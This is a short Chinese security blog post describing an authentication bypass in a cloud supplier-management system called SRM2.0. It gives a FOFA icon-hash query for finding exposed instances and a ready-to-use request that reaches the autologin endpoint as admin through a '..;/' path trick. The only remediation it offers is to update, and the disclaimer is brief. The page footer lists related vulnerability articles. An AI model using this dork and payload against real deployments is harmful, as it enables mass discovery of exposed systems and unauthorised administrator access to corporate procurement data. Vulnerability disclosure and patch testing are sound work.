某云彩SRM2.0后台绕过漏洞

扣脚大汉在网络2024-09-06 16:01

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码 
icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。

该系统在autologin接口处存在权限绕过漏洞

漏洞复现

payload

复制代码 
http://ip/adpweb/static/..;/api/sys/app/autologin?loginName=admin

修复建议

更新到最新版本

相关推荐
IT 青年6 天前
CVE-2020-24557
漏洞
第十六年盛夏.8 天前
【网络安全】不安全的反序列化漏洞
网络安全·漏洞
IT 青年15 天前
CVE-2021-21148
漏洞
远方23524 天前
Android无需授权直接访问Android/data目录漏洞
android·安全·文件·漏洞·目录·权限
浮江雾1 个月前
XXE漏洞1-XXE 漏洞简介-XML 语法-DTD 讲解-外部实体讲解
xml·安全·web安全·漏洞·xxe
IT 青年1 个月前
Windows 用户账户控制(UAC)绕过漏洞
漏洞
IT 青年1 个月前
HTTP请求走私漏洞
漏洞
智云软件测评服务2 个月前
Web应用安全漏洞扫描:原理、常用方法及潜在风险解析?
应用·漏洞·扫描
网安INF2 个月前
CVE-2024-23897源码分析与漏洞复现(Jenkins 任意文件读取)
java·web安全·网络安全·jenkins·漏洞
网安INF2 个月前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
热门推荐
01UV安装并设置国内源02全球最强模型Grok4,国内已可免费使用!(附教程)032025最新国内服务器可用docker源仓库地址大全(2025年8月更新)04Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code05[已解决]VSCode右键菜单消失恢复06KGG转MP3工具|非KGM文件|解密音频07GPT-5 使用限制与国内升级全攻略(免费 / Plus / Pro)【2025 最新】08Cursor 终端“卡死/无响应”问题的解法09OpenAI重返开源!GPT-OSS本地部署完全指南10TRAE Rules 实践:为项目配置 6A 工作流